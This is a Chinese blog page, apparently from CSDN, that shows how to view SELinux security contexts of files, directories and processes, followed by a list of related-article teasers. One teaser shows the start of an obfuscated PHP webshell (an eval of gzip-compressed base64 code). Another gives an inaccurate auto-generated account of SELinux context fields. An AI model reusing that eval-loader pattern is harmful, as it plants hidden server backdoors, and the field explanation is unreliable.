SELinux安全上下文查看方法(超详细)

最新推荐文章于 2022-01-27 17:15:51 发布
置顶 最新推荐文章于 2022-01-27 17:15:51 发布
阅读量1k 收藏 7
点赞数 1
分类专栏: 大数据 互联网 人工智能 文章标签: Linux 大数据 大数据学习 大数据开发 大数据分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiujiudsj/article/details/104195516
版权
本文详细介绍了如何查看Linux中文件和目录的安全上下文,包括使用`ls -Z`和`ls -Zd`命令,以及如何查看进程的安全上下文。文章还解释了安全上下文的四个关键字段:身份、角色、类型和灵敏度,强调了类型字段在进程访问文件权限中的重要性。同时,提到了`seinfo`命令用于查询SELinux的相关信息。
摘要由CSDN通过智能技术生成

SELinux 管理过程中,进程是否可以正确地访问文件资源,取决于它们的安全上下文。进程和文件都有自己的安全上下文,SELinux 会为进程和文件添加安全信息标签,比如 SELinux 用户、角色、类型、类别等,当运行 SELinux 后,所有这些信息都将作为访问控制的依据。

 

首先,通过一个实例看看如何查看文件和目录的安全上下文,执行命令如下:

[root@localhost ~]# ls -Z
#使用选项-Z查看文件和目录的安全上下文
-rw——-.root root system_u:object_r:admin_home_t:s0 anaconda-ks.cfg
-rw-r–r–.root root system_u:object_r:admin_home_t:s0 install.log
-rw-r–r–.root root system_u:object_r:admin_home_t:s0 install.log.syslog

可以看到,查看文件的安全上下文非常简单,就是使用“ls -Z”命令。而在此基础上,如果想要查看目录的安全上下文,需要添加“-d”选项,代表查看目录本身,而非目录下的子文件。举个例子:

[root@localhost ~]# ls -Zd /var/www/html/
drwxr-xr-x.root root system_u:object_r:httpd_sys_content_t:s0 /var/www/html/

那么,该如何查看进程的安全上下文呢?只需使用 ps 命令即可。命令如下:

[root@localhost ~]# service httpd start
#启动apache服务
[root@localhost ~]# ps auxZ | grep httpd
unconfined_u:system_r:httpd_t:s0 root 25620 0.0 0.5 11188 3304 ? Ss

最低0.47元/天 解锁文章
jiujiudsj
关注
专栏目录
linux怎么看文件安全上下文,Linux安全控制访问模块之SElinux
weixin_31271165的博客
04-28 919
SElinux1、Selinux介绍:Linux的一个强制访问控制安全模块,2000年以GNU GPL发布,Linux内核2.6版本集成在内核中。DAC:自由访问控制,进程是无束缚的。MAC:强制访问控制,策略的规则决定控制的严格程度(策略被用来定义被限制的进程能够使用那些资源[文件和端口]);进程的可以被限制的;默认情况下,没有允许的行为将被拒绝。2、Selinux的四种工作类型:(1)star...
linux中如何查看文件上下文,linux通过grep根据关键字查找日志文件上下文
weixin_34791683的博客
04-29 5206
linux通过grep根据关键字查找日志文件上下文1、在标准unix/linux下的grep命令中,通过以下参数控制上下文的显示:grep -C 10 keyword catalina.out 显示file文件中匹配keyword字串那行以及上下10行grep -B 10 keyword catalina.out 显示keyword及前10行grep -A 10 keyword catalina....
Linux系统中 SElinux的介绍
Asukaaaa的博客
11-07 1126
什么是SElinux:                 SELinux(Security-Enhanced Linux) 【安全增强型linux】是美国国家安全局(NSA)对于强制访问控制的实现,它是一个 Linux 内核模块,也是 Linux 的一个安全子系统。NSA是在Linux社区的帮助下开发了一种访问控制体系,在这种访问控制体系的限制下,进程只能访问那些在他的任务中所需要文件。SELi...
SELinux安全上下文的认识
虫写的专栏
10-30 1万+
1、SELinux安全上下文 安全上下文是一个简单的、一致的访问控制属性,在SELinux中,类型标识符是安全上下文的主要组成部分,由于历史原因,一个进程的类型通常被称为一个域(domain),"域"和"域类型"意思都一样,即都是安全上下文中的“TYPE”。 SELinux对系统中的许多命令做了修改,通过添加一个-Z选项显示客体和主体的安全上下文。     1) 系统根据PAM子系统中的p
linux查看目录安全上下文,semanage命令
weixin_32770423的博客
04-29 520
semanage命令是用来查询与修改SELinux默认目录的安全上下文SELinux的策略与规则管理相关命令:seinfo命令、sesearch命令、getsebool命令、setsebool命令、semanage命令。语法semanage {login|user|port|interface|fcontext|translation} -lsemanage fcontext -{a|d|m} ...
Linuxselinux安全上下文
Ying_smile的博客
10-13 588
查看selinux安全上下文:ls -Z [root@localhost ~]# touch /var/ftp/hellohello 新建文件测试 [root@localhost ~]# ls /var/ftp/ 查看目录ftp中的内容 hellohello pub [root@localhost ~]# touch /mnt/haha1 [root@localhost ~]# mv /mnt/haha1 /var/ftp/haha1 #复制是新建的过程,移动是重命名的过程,文件系统权限和属性不会改
Selinux设定、安全上下文的更改、sebool设置及setrouble排错
Aimee_c的博客
02-23 1960
1.selinux功能 selinux 内核级加强型火墙 selinux功能: 当selinux开启会给系统中的每一个文件及每一个程序加载安全上下文 ,特定安全上下文的程序只能访问特定安全上下文的文件。当selinux开启会对服务本身相对不安全的功能加载开关sebool并且设定开关为关闭状态以保证服务安全性 当需要此功能时需要级用户手动调节。selinux是保护系统安全性的插件。 seliux关...
永久改变SELINUX安全上下文
a18829898663的博客
04-29 4235
SELINUX的管理
详解linux下的selinux(功能、安全上下文、sebool、setrouble)
ly_qiu的博客
03-02 1446
######################### 1.selinux功能 seliux关闭状态: 在/mnt/中建立文件文件安全上下文为空文件被移动到ftp默认发布目录中可以被访问 ftp程序安全上下文为空 用户可以上传文件 当selinux开启以上功能操作均失败 selinux: 内核级加强型火墙 selinux功能: 当selinux开启会给系统中的每一个文件及每一个程序加载安全上下文 特定...
linux 下的selinux简介(安全上下文selinux布尔值)
weixin_44818720的博客
04-22 849
计划第三方
安全上下文(进程)
weixin_34258782的博客
05-08 263
为什么80%的码农都做不了架构师?>>> ...
SEandroid 安全机制---进程安全上下文
Jack的博客
06-10 1441
3进程安全上下文 前面一篇文章分析了文件安全上下文关联过程。但是在SEAndroid中,除了要给文件关联安全上下文外, 还需要给进程关联安全上下文,因为只有当进程和文件都关联安全上下文之后,SEAndroid安全策略才能发挥作用。 也就是说,当一个进程试图访问一个文件时,SEAndroid会将进程和文件的安全上下文提取出来,根据安全策略规则,决定是否允许访问。      在传统的Linux
关于对进程的安全上下文的理解
weixin_45675176的博客
11-14 201
安全上下文图解 进程安全上下文: 进程对文件的访问权限应用模型: 进程的属主与文件的属主是否相同;如果相同,则应用属主权限; 否则,则检查进程的属主是否属于文件的属组;如果是,则应用属组权限; 否则,就只能应用other的权限;总的来看进程对文件的权限受限于文件的本身的权限(ugo) 图示进程安全上下文思维导图: ...
linux进程安全上下文,Selinux安全上下文详解
weixin_28894087的博客
04-29 1044
SELinux介绍DAC:自由访问控制MAC: 强制访问控制DAC环境下进程是无束缚的MAC环境下策略的规则决定控制的严格程度MAC环境下进程可以被限制策略被用来定义被限制的进程能够使用哪些资源(文件和端口)默认情况下,没有被明确允许的行为将被拒绝Selinux策略对象(object):所有可以读取的对象,包括文件、目录和进程、端口等主体:进程称为主体(subject)Selinux中所有的文件...
linux系统下的selinux初级管理
lyy962464的博客
08-21 444
一、selinux安全性 1、selinux内核级加强型防火墙,是可以保护系统安全性的额外机制。 2、selinux的功能             限制服务的功能              限制服务访问功能 3、验证selinux的两个功能 1)在服务端/mnt/目录下建立westos文件,并将westos移动到/var/ftp/pub/下 2)匿名登陆lftp服务,发现wes...
Linux_12_SELinux
爱喝可乐的w
01-27 618
Linux进程权限管理SELinux安全强化Linux
selinux 简介
qq_43679416的博客
09-07 1668
SELinux(Security-Enhanced Linux) 是美国国家安全局(NSA)对于强制访问控制的实现,是 Linux历史上最杰出的新安全子系统。 SELinux提供了一种灵活的强制访问控制(MAC)系统,且内嵌于Linux Kernel中。SELinux定义了系统中每个【用户】、【进程】、【应用】和【文件】的访问和转变的权限,然后它使用一个安全策略来控制这些实体(用户、进程、应用和文件)之间的交互,安全策略指定如何严格或宽松地进行检查。(权限) 1.对内核对象和服务的访问控制 2.对进程
http://www.htsjpt.com/admin.php,webshell/php/xiao.php.txt at f875e7b78085777b8a10c3456478dbd192d851a...
热门推荐
weixin_39980575的博客
03-13 67万+
eval(gzuncompress(base64_decode("eJzsvfl3G8eROP6z/J7/h9GYK4AmiIP3IVDiTUq8RJA6qceHY0BABDDQAOAhW/u/MNpNvLJ2I0qkLoq6SJsUZVEUSUmOnnP4WCeO1slGzsd2rDjvW9XHTA8wACnFye7nky9tkUAf1dXV1dXV1dXViqap2rCmJFUtHU2M2Ku...
selinux安全上下文命名
最新发布
08-17
SELinux安全上下文命名是指为文件、目录、进程等在SELinux中设置安全上下文的命名规则。SELinux使用安全上下文来标识和控制对象的访问权限。安全上下文是由一个或多个部分组成的,通常包括标签和类型。 在SELinux中,安全上下文由以下几个部分组成: 1. 用户: 表示文件或进程所属的主体,以用户标识符(UID)表示。 2. 角色: 表示主体所扮演的角色,以角色标识符(RID)表示。 3. 类型: 表示对象的类型,以类型标识符(TID)表示。 4. 完全性级别: 表示对象的完整性级别,以完整性级别标识符(SID)表示。 安全上下文的命名规则一般遵循以下格式: user:role:type:level 例如,一个文件的安全上下文可以是: user_u:object_r:etc_t:s0 其中,user_u表示用户,object_r表示角色,etc_t表示类型,s0表示完整性级别。 需要注意的是,安全上下文的命名规范可能因不同的SELinux策略而有所不同。在具体应用中,可以根据实际需求和策略要求进行相应的安全上下文命名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值